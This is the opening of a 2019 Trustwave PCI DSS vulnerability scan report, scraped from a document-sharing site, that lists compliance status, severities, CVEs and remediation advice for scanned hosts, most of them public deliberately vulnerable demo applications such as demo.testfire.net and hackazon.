Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                

Ceh PDF

Download as pdf or txt
Download as pdf or txt
You are on page 1of 1642

Report Date: 2019-08-06

Attestation of Scan Compliance


A.1 Scan Customer Information A.2 Approved Scanning Vendor Information
Company: JS Int-B Roles 08052019 Company: Trustwave Holdings, Inc.
Contact Name: Jim PCIScan Job Title: Contact Name: Trustwave Support Job Title:

Telephone: E-mail: jsintbroles08052019@tw.com Telephone: 1-800-363-1621 E-mail: support@trustwave.com


Business Address: Business Address: 70 West Madison St., Ste 600
City: State/Province: City: Chicago State/Province: IL

ZIP/Postal Code: Country: ZIP/Postal Code: 60602.0 Country: US


Website / URL: Website / URL: www.trustwave.com

A.3 Scan Status

Date scan completed: 2019-08-05 Scan expiration date (90 days from date scan completed): N/A
Compliance status: Fail Scan report type: Full Scan
Number of unique in-scope components scanned: 4
Number of identified failing vulnerabilities: 170
Number of components found by ASV but not scanned because 13
scan customer confirmed they were out of scope:

A.4 Scan Customer Attestation Test A.5 ASV Attestation


JS Int-B Roles 08052019 attests on 2019-08-05 that this scan (either by itself or combined with multiple, This scan and report was prepared and conducted by Trustwave under certificate number 3702-01-13 (2018),
partial, or failed scans/rescans, as indicated in the above Section A.3, "Scan Status") includes all components 3702-01-12 (2017), 3702-01-11 (2016), 3702-01-10 (2015), 3702-01-09 (2014), 3702-01-08 (2013), 3702-01-
which should be in scope for PCI DSS, any component considered out of scope for this scan is properly 07 (2012), 3702-01-06 (2011), 3702-01-05 (2010), according to internal processes that meet PCI DSS
segmented from my cardholder data environment, and any evidence submitted to the ASV to resolve scan Requirement 11.2.2 and the ASV Program Guide.
exceptions-including compensating controls if applicable-is accurate and complete. JS Int-B Roles 08052019
also acknowledges 1) accurate and complete scoping of this external scan is my responsibility, and 2) this Trustwave attests that the PCI DSS scan process was followed, including a manual or automated Quality
scan result only indicates whether or not my scanned systems are compliant with the external vulnerability Assurance process with customer boarding and scoping practices, review of results for anomalies, and review
scan requirement of PCI DSS; this scan result does not represent my overall compliance status with PCI DSS and correction of 1) disputed or incomplete results, 2) false positives, 3) compensating controls (if applicable),
or provide any indication of compliance with other PCI DSS requirements. and 4) active scan interference. This report and any exceptions were reviewed by the Trustwave Quality
Assurance Process.
Signature Printed Name

Title Date

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 1 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
HIDDEN TEXT TO MARK THE BEGINNING OF THE TABLE OF CONTENTS

Vulnerability Scan Report: Table of Contents

Attestation of Scan Compliance 1

Part 1. Scan Information 1

Part 2. Component Compliance Summary 1

Part 3a. Vulnerabilities Noted for Each Component 1

ASV Scan Report Summary 4

Part 3b. Special Notes by Component 28

Part 3c. Special Notes - Full Text 29

Part 4a. Scope Submitted by Scan Customer for Discovery 30

Part 4b. Scan Customer Designated "In-Scope" Components (Scanned) 31

Part 4c. Scan Customer Designated "Out-of-Scope" Components (Not Scanned) 31

ASV Scan Report Vulnerability Details 34

Part 1. Scan Information 34

Part 2. Vulnerability Details 34

agent-av-mirror-inc.tw-test.net (MV PCI1) 34

crackme.cenzic.com (MV PCI2) 35

crackme.trustwave.com (MV PCI3) 40

crackmebank.campbell.devlab (MV PCI4) 44

cyclone.ciphertechs.com 45

demo.testfire.net (Jen's PCI Test) 46

google-gruyere.appspot.com (MV PCI6) 812

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 2 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

Vulnerability Scan Report: Table of Contents

hackazon.webscantest.com (MV PCI7) 826

hackxor.sourceforge.net (MV PCI7) 1584

ioc-signatures-inc.tw-test.net (MV PCI8) 1605

jarlsberg.appspot.com (MV PCI9) 1606

pentesteracademylab.appspot.com (MV PCI10) 1621

port-app-dv1-01.tw-test.net (MV PCI11) 1634

port-app-dv1-02.tw-test.net (MV PCI12) 1635

port-app-dv2-02.tw-test.net (MV PCI13) 1636

port-evm-dv1-03.tw-test.net 1637

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 3 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Part 1. Scan Information

Scan Customer Company JS Int-B Roles 08052019 ASV Company Trustwave Holdings, Inc.
Date Scan Completed 2019-08-05 Scan Expiration Date N/A

Part 2. Component Compliance Summary

Component (IP Address, domain, etc): agent-av-mirror-inc.tw-test.net (MV PCI1) Pass


Component (IP Address, domain, etc): crackme.cenzic.com (MV PCI2) Pass
Component (IP Address, domain, etc): crackme.trustwave.com (MV PCI3) Pass
Component (IP Address, domain, etc): crackmebank.campbell.devlab (MV PCI4) Pass
Component (IP Address, domain, etc): cyclone.ciphertechs.com Fail
Component (IP Address, domain, etc): demo.testfire.net (Jen's PCI Test) Fail
Component (IP Address, domain, etc): google-gruyere.appspot.com (MV PCI6) Pass
Component (IP Address, domain, etc): hackazon.webscantest.com (MV PCI7) Pass
Component (IP Address, domain, etc): hackxor.sourceforge.net (MV PCI7) Pass
Component (IP Address, domain, etc): ioc-signatures-inc.tw-test.net (MV PCI8) Pass
Component (IP Address, domain, etc): jarlsberg.appspot.com (MV PCI9) Pass
Component (IP Address, domain, etc): pentesteracademylab.appspot.com (MV PCI10) Pass
Component (IP Address, domain, etc): port-app-dv1-01.tw-test.net (MV PCI11) Pass
Component (IP Address, domain, etc): port-app-dv1-02.tw-test.net (MV PCI12) Pass
Component (IP Address, domain, etc): port-app-dv2-02.tw-test.net (MV PCI13) Pass
Component (IP Address, domain, etc): port-evm-dv1-03.tw-test.net Fail

Part 3a. Vulnerabilities Noted for Each Component

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 4 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Note to scan customer:
1 agent-av-mirror- Host Detected Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
inc.tw-test.net
Database.
(MV PCI1)

Note to scan customer:


2 agent-av-mirror- Hostname Resolved Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
inc.tw-test.net
Database.
(MV PCI1)

Consolidated Solution/Correction Plan for the above Component:

Note to scan customer:


3 crackme.cenzic.co System Responds to SYN+FIN Low 0.0 Pass
This vulnerability is not recognized in the National Vulnerability
m TCP Packets
Database.
(MV PCI2)

Note to scan customer:


4 crackme.cenzic.co Host Detected Info 0.0 Pass
This vulnerability is not recognized in the National Vulnerability
m
Database.
(MV PCI2)

Note to scan customer:


5 crackme.cenzic.co Hostname Resolved Info 0.0 Pass
This vulnerability is not recognized in the National Vulnerability
m
Database.
(MV PCI2)

6 crackme.cenzic.co NTP Service Not Synchronized Info 0.0 Pass


m
(MV PCI2)

7 crackme.cenzic.co Unknown services found Info 0.0 Pass


m
(MV PCI2)

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 5 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Note to scan customer:
8 crackme.cenzic.co Service Detected Info 0.0 Pass
This vulnerability is not recognized in the National Vulnerability
m
Database.
(MV PCI2)

Consolidated Solution/Correction Plan for the above Component:

• Restrict access to any files, applications, and/or network services for which there is no business requirement to be publicly accessible.

Note to scan customer:


9 crackme.trustwav System Responds to SYN+FIN Low 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
e.com TCP Packets
Database.
(MV PCI3)

10 crackme.trustwav NTP Service Not Synchronized Info 0.0 Out of Scope


e.com
(MV PCI3)
Note to scan customer:
11 crackme.trustwav Host Detected Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
e.com
Database.
(MV PCI3)

12 crackme.trustwav Unknown services found Info 0.0 Out of Scope


e.com
(MV PCI3)
Note to scan customer:
13 crackme.trustwav Hostname Resolved Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
e.com
Database.
(MV PCI3)

Note to scan customer:


14 crackme.trustwav Service Detected Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
e.com
Database.
(MV PCI3)

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 6 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Consolidated Solution/Correction Plan for the above Component:

• Restrict access to any files, applications, and/or network services for which there is no business requirement to be publicly accessible.

Note to scan customer:


15 crackmebank.cam Host Detected Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
pbell.devlab
Database.
(MV PCI4)

Note to scan customer:


16 crackmebank.cam Hostname Resolved Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
pbell.devlab
Database.
(MV PCI4)

Consolidated Solution/Correction Plan for the above Component:

Note to scan customer:


17 cyclone.ciphertec Hostname could not be Low 0.0 Fail
This vulnerability is not recognized in the National Vulnerability
hs.com Resolved
Database. Host not responsive.

Consolidated Solution/Correction Plan for the above Component:

• Verify your Scan Setup for correct IP Address and Domain Name information. Configure your network to allow access from Trustwave scanners.

Note to scan customer:


18 demo.testfire.net TLSv1.0 Supported High 10.0 Fail
This vulnerability is not recognized in the National Vulnerability
(Jen's PCI Test)
Database. TLS v1.0 violates PCI DSS and is considered an automatic
failing condition.

Note to scan customer:


19 demo.testfire.net SQL Injection Vulnerability High 7.5 Fail
A SQL injection vulnerability violates PCI DSS and is considered an
(Jen's PCI Test)
automatic failing condition. This vulnerability is not recognized in the
National Vulnerability Database.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 7 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)

Note to scan customer:


20 demo.testfire.net Unencrypted Password Form Medium 6.1 Fail
This vulnerability is not recognized in the National Vulnerability
(Jen's PCI Test)
Database. Unencrypted communication channels violate
Requirement 4 of the PCI DSS.

Note to scan customer:


21 demo.testfire.net Insecure transmission of Medium 6.1 Fail
This vulnerability is not recognized in the National Vulnerability
(Jen's PCI Test) credentials
Database. Unencrypted communication channels violate
Requirement 4 of the PCI DSS.

Note to scan customer:


22 demo.testfire.net Information leakage via HTML or Medium 5.0 Fail
This vulnerability is not recognized in the National Vulnerability
(Jen's PCI Test) JavaScript comments
Database.

Note to scan customer:


23 demo.testfire.net Web Page Transmits Login Medium 4.6 Fail
This vulnerability is not recognized in the National Vulnerability
(Jen's PCI Test) Credentials Without Encryption
Database. Unencrypted communication channels violate
Requirement 4 of the PCI DSS.

Note to scan customer:


24 demo.testfire.net Cross-Site Scripting Medium 4.3 Fail
A cross-site scripting vulnerability violates PCI DSS and is considered
(Jen's PCI Test)
an automatic failing condition. This vulnerability is not recognized in
the National Vulnerability Database.

Note to scan customer:


25 demo.testfire.net Insecure configuration of Cookie Medium 4.3 Fail
This vulnerability is not recognized in the National Vulnerability
(Jen's PCI Test) attributes
Database.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 8 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)

26 demo.testfire.net SSLv2, SSLv3 and TLS v1.0 Medium 4.3 Fail


(Jen's PCI Test) Vulnerable to CBC Attacks via
chosen-plaintext (BEAST), CVE-
2011-3389
Note to scan customer:
27 demo.testfire.net No Clickjacking Protection Low 2.6 Pass
This vulnerability is not recognized in the National Vulnerability
(Jen's PCI Test) present
Database.

Note to scan customer:


28 demo.testfire.net Absence of caching directives Low 2.1 Pass
This vulnerability is not recognized in the National Vulnerability
(Jen's PCI Test) for pages having forms
Database.

Note to scan customer:


29 demo.testfire.net Auto-Completion Enabled for Low 1.2 Pass
This vulnerability is not recognized in the National Vulnerability
(Jen's PCI Test) Password Fields
Database.

30 demo.testfire.net HTTP Responses Missing Info 0.0 Pass


(Jen's PCI Test) Character Encoding
Note to scan customer:
31 demo.testfire.net Insufficient or No use of Strict Info 0.0 Pass
This vulnerability is not recognized in the National Vulnerability
(Jen's PCI Test) Transport Security header
Database.

Note to scan customer:


32 demo.testfire.net Hostname Resolved Info 0.0 Pass
This vulnerability is not recognized in the National Vulnerability
(Jen's PCI Test)
Database.

Note to scan customer:


33 demo.testfire.net Website Location Detected Info 0.0 Pass
This vulnerability is not recognized in the National Vulnerability
(Jen's PCI Test)
Database.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 9 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Note to scan customer:
34 demo.testfire.net Insecure or no Content-Security- Info 0.0 Pass
This vulnerability is not recognized in the National Vulnerability
(Jen's PCI Test) Policy header
Database.

35 demo.testfire.net Discovered HTTP Methods Info 0.0 Pass


(Jen's PCI Test)
Note to scan customer:
36 demo.testfire.net Website Detected Info 0.0 Pass
This vulnerability is not recognized in the National Vulnerability
(Jen's PCI Test)
Database.

Note to scan customer:


37 demo.testfire.net Embedded links or code from Info 0.0 Pass
This vulnerability is not recognized in the National Vulnerability
(Jen's PCI Test) out-of-scope domains
Database.

Note to scan customer:


38 demo.testfire.net Service Detected Info 0.0 Pass
This vulnerability is not recognized in the National Vulnerability
(Jen's PCI Test)
Database.

39 demo.testfire.net Enumerated SSL/TLS Cipher Info 0.0 Pass


(Jen's PCI Test) Suites

40 demo.testfire.net Enumerated Hostnames Info 0.0 Pass


(Jen's PCI Test)
Note to scan customer:
41 demo.testfire.net Enumerated Applications Info 0.0 Pass
This vulnerability is not recognized in the National Vulnerability
(Jen's PCI Test)
Database.

Note to scan customer:


42 demo.testfire.net SSL-TLS Certificate Information Info 0.0 Pass
This vulnerability is not recognized in the National Vulnerability
(Jen's PCI Test)
Database.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 10 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)

43 demo.testfire.net SSL Perfect Forward Secrecy Info 0.0 Pass


(Jen's PCI Test) Supported
Note to scan customer:
44 demo.testfire.net Host Detected Info 0.0 Pass
This vulnerability is not recognized in the National Vulnerability
(Jen's PCI Test)
Database.

45 demo.testfire.net Discovered Web Directories Info 0.0 Pass


(Jen's PCI Test)
Consolidated Solution/Correction Plan for the above Component:

• Ensure that all applications and services running on this host are configured to appropriately restrict access to sensitive information. This includes account
information and configuration settings.
• Configure the SSL service(s) running on this host to adhere to information security best practices.
• Ensure that any web applications running on this host properly validate and transmit user input in a secure manner.
• Configure the HTTP service(s) running on this host to adhere to information security best practices.
• Restrict access to any files, applications, and/or network services for which there is no business requirement to be publicly accessible.
• Ensure that any web applications running on this host is configured following industry security best practices.

Note to scan customer:


46 google- TLSv1.0 Supported High 10.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
gruyere.appspot.c
Database. TLS v1.0 violates PCI DSS and is considered an automatic
om
failing condition.
(MV PCI6)

47 google- Block cipher algorithms with Medium 5.0 Out of Scope


gruyere.appspot.c block size of 64 bits (like DES
om and 3DES) birthday attack
(MV PCI6) known as Sweet32, CVE-2016-
2183

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 11 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)

48 google- SSLv2, SSLv3 and TLS v1.0 Medium 4.3 Out of Scope
gruyere.appspot.c Vulnerable to CBC Attacks via
om chosen-plaintext (BEAST), CVE-
(MV PCI6) 2011-3389
Note to scan customer:
49 google- System Responds to SYN+FIN Low 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
gruyere.appspot.c TCP Packets
Database.
om
(MV PCI6)

50 google- Enumerated Hostnames Info 0.0 Out of Scope


gruyere.appspot.c
om
Note to scan customer:
51 google- Hostname Resolved Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
gruyere.appspot.c
Database.
om
(MV PCI6)

52 google- Wildcard SSL Certificate Info 0.0 Out of Scope


gruyere.appspot.c Detected
om
Note to scan customer:
53 google- Service Detected Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
gruyere.appspot.c
Database.
om
(MV PCI6)
Note to scan customer:
54 google- Host Detected Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
gruyere.appspot.c
Database.
om
(MV PCI6)

55 google- Enumerated SSL/TLS Cipher Info 0.0 Out of Scope


gruyere.appspot.c Suites
om

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 12 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)

56 google- SSL Certificate Expiring Soon Info 0.0 Out of Scope


gruyere.appspot.c
om
Note to scan customer:
57 google- SSL-TLS Certificate Information Info 0.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
gruyere.appspot.c
Database.
om
(MV PCI6)
Consolidated Solution/Correction Plan for the above Component:

• Restrict access to any files, applications, and/or network services for which there is no business requirement to be publicly accessible.
• Configure the SSL service(s) running on this host to adhere to information security best practices.

Note to scan customer:


58 hackazon.websca SQL Injection Vulnerability High 7.5 Out of Scope
A SQL injection vulnerability violates PCI DSS and is considered an
ntest.com
automatic failing condition. This vulnerability is not recognized in the
(MV PCI7)
National Vulnerability Database.

59 hackazon.websca Apache HTTP Server Multiple High 7.5 Out of Scope


ntest.com Vulnerabilities 2.2.x Through
(MV PCI7) 2.2.34 and 2.4.x prior to 2.4.26,
CVE-2017-9788 CVE-2017-7679
CVE-2017-7668 CVE-2017-3169
CVE-2017-3167

60 hackazon.websca HTTPoxy Vulnerability, CVE- Medium 6.8 Out of Scope


ntest.com 2016-5387 CVE-2016-5388 CVE-
(MV PCI7) 2016-5386 CVE-2016-5385

61 hackazon.websca Apache HTTP Server FilesMatch Medium 6.8 Out of Scope


ntest.com Directive Improper Input
(MV PCI7) Validation Vulnerability, CVE-
2017-15715

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 13 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)

62 hackazon.websca Apache HTTP Server Medium 6.8 Out of Scope


ntest.com mod_auth_digest Weak Digest
(MV PCI7) Auth Nonce Generation
Vulnerability, CVE-2018-1312
Note to scan customer:
63 hackazon.websca Open Redirect Vulnerability Medium 6.4 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ntest.com
Database.
(MV PCI7)

64 hackazon.websca Apache HTTP Server Medium 6.4 Out of Scope


ntest.com mod_auth_digest Uninitialized
(MV PCI7) Memory Reflection Vulnerability,
CVE-2017-9788
Note to scan customer:
65 hackazon.websca Insecure transmission of Medium 6.1 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ntest.com credentials
Database. Unencrypted communication channels violate
(MV PCI7)
Requirement 4 of the PCI DSS.

Note to scan customer:


66 hackazon.websca Unencrypted Password Form Medium 6.1 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ntest.com
Database. Unencrypted communication channels violate
(MV PCI7)
Requirement 4 of the PCI DSS.

67 hackazon.websca Apache HTTP Server Medium 6.0 Out of Scope


ntest.com mod_auth_digest Access Control
(MV PCI7) Bypass Vulnerability, CVE-2019-
0217
Note to scan customer:
68 hackazon.websca Apache HTTP Server Medium 5.0 Out of Scope
This vulnerability is purely a denial-of-service vulnerability and it is
ntest.com mod_cache_socache out of
not considered a failing condition under the PCI DSS.
(MV PCI7) Bound Read Vulnerability, CVE-
2018-1303

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 14 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)

69 hackazon.websca Apache HTTP Server Medium 5.0 Out of Scope


ntest.com mod_session_crypto Padding
(MV PCI7) Oracle Attack Vulnerability, CVE-
2016-0736
NVD CVSS Score: 5.0
70 hackazon.websca Apache HTTP Server Medium 5.0 Out of Scope
Note to scan customer:
ntest.com mod_authnz_ldap Out-of-Bound
This vulnerability is purely a denial-of-service vulnerability and it is
(MV PCI7) Write Vulnerability, CVE-2017-
not considered a failing condition under the PCI DSS.
15710

71 hackazon.websca Apache HTTP Server Medium 5.0 Out of Scope


ntest.com mod_session_cookie Session
(MV PCI7) Expiry Time Vulnerability, CVE-
2018-17199
Note to scan customer:
72 hackazon.websca Information Disclosure through Medium 5.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ntest.com Application Exception
Database. Information leakage through detailed application error
(MV PCI7)
messages violates PCI DSS and is considered an automatic failing
condition.

73 hackazon.websca Apache HTTP Server Request Medium 5.0 Out of Scope


ntest.com Smuggling Vulnerability via
(MV PCI7) Invalid Chunk-Extension
Characters, CVE-2015-3183

74 hackazon.websca Apache HTTP Server URL Medium 5.0 Out of Scope


ntest.com Normalization Vulnerability,
(MV PCI7) CVE-2019-0220
Note to scan customer:
75 hackazon.websca Apache HTTP Server through Medium 5.0 Out of Scope
This vulnerability is purely a denial-of-service vulnerability and it is
ntest.com 2.4.12 allows remote attackers
not considered a failing condition under the PCI DSS.
(MV PCI7) to cause a denial of service,
CVE-2015-0228

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 15 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)
Note to scan customer:
76 hackazon.websca Apache HTTP Server before Medium 5.0 Out of Scope
This vulnerability is purely a denial-of-service vulnerability and it is
ntest.com 2.4.11 allows remote attackers
not considered a failing condition under the PCI DSS.
(MV PCI7) to cause a denial of service via
null pointer, CVE-2014-3581

77 hackazon.websca Apache HTTP Server Multiple Medium 5.0 Out of Scope


ntest.com Vulnerabilities 2.4.x Through
(MV PCI7) 2.4.23, CVE-2016-2161 CVE-
2016-0736

78 hackazon.websca Apache HTTP Allows Remote Medium 5.0 Out of Scope


ntest.com Attackers to Read Privileged
(MV PCI7) Memory, CVE-2017-9798
Note to scan customer:
79 hackazon.websca Non-HttpOnly Session Cookies Medium 5.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ntest.com Identified
Database.
(MV PCI7)

80 hackazon.websca Apache HTTP Whitespace Char Medium 5.0 Out of Scope


ntest.com Injection Vulnerability, CVE-
(MV PCI7) 2016-8743
Note to scan customer:
81 hackazon.websca Apache HTTP Server mod_dav Medium 5.0 Out of Scope
This vulnerability is purely a denial-of-service vulnerability and it is
ntest.com Denial of Service Vulnerability
not considered a failing condition under the PCI DSS.
(MV PCI7) via a Crafted DAV WRITE
Request, CVE-2013-6438
Note to scan customer:
82 hackazon.websca Apache HTTP Server Medium 5.0 Out of Scope
This vulnerability is purely a denial-of-service vulnerability and it is
ntest.com mod_log_config Denial of
not considered a failing condition under the PCI DSS.
(MV PCI7) Service Vulnerability, CVE-2014-
0098
Note to scan customer:
83 hackazon.websca Non-Secure Session Cookies Medium 5.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ntest.com Identified
Database.
(MV PCI7)

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 16 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)

Note to scan customer:


84 hackazon.websca Information leakage via HTML or Medium 5.0 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ntest.com JavaScript comments
Database.
(MV PCI7)

Note to scan customer:


85 hackazon.websca Web Page Transmits Login Medium 4.6 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ntest.com Credentials Without Encryption
Database. Unencrypted communication channels violate
(MV PCI7)
Requirement 4 of the PCI DSS.

Note to scan customer:


86 hackazon.websca Apache HTTP Server out of Medium 4.3 Out of Scope
This vulnerability is purely a denial-of-service vulnerability and it is
ntest.com Bound Access Vulnerability,
not considered a failing condition under the PCI DSS.
(MV PCI7) CVE-2018-1301

87 hackazon.websca Apache HTTP Server mod_lua Medium 4.3 Out of Scope


ntest.com module access restriction
(MV PCI7) bypass, CVE-2014-8109
Note to scan customer:
88 hackazon.websca Apache HTTP Server Medium 4.3 Out of Scope
This vulnerability is purely a denial-of-service vulnerability and it is
ntest.com mod_deflate Denial of Service
not considered a failing condition under the PCI DSS.
(MV PCI7) Vulnerability, CVE-2014-0118

Note to scan customer:


89 hackazon.websca Cross-Site Scripting Medium 4.3 Out of Scope
A cross-site scripting vulnerability violates PCI DSS and is considered
ntest.com
an automatic failing condition. This vulnerability is not recognized in
(MV PCI7)
the National Vulnerability Database.

90 hackazon.websca Apache HTTP Server Bypass Medium 4.3 Out of Scope


ntest.com Access Restriction Vulnerability
(MV PCI7) via Require Directive, CVE-2015-

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 17 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Summary

Vulnerabilities Noted per Severity CVSS Compliance Exceptions, False Positives, or Compensating Controls (Noted by
# Component
Component Level Score Status the ASV for this vulnerability)

3185
Note to scan customer:
91 hackazon.websca Insecure configuration of Cookie Medium 4.3 Out of Scope
This vulnerability is not recognized in the National Vulnerability
ntest.com attributes
Database.
(MV PCI7)

Note to scan customer:


92 hackazon.websca jQuery Cross-Domain Medium 4.3 Out of Scope
A cross-site scripting vulnerability violates PCI DSS and is considered
ntest.com Asynchronous JavaScript and
an automatic failing condition.
(MV PCI7) Extensible Markup Language
Request Cross-site Scripting
Vulnerability, CVE-2015-9251

93 hackazon.websca Apache HTTP Server Medium 4.3 Out of Scope


ntest.com mod_userdir CRLF injection
(MV PCI7) Vulnerability, CVE-2016-4975

94 hackazon.websca Apache HTTP Server Low 3.5 Out of Scope


ntest.com mod_session Tampering
(MV PCI7) Vulnerability, CVE-2018-1283
Note to scan customer:
95 hackazon.websca No Clickjacking Protection Low 2.6 Out of Scope
This vulnerability is not recognized in the National Vulnerability
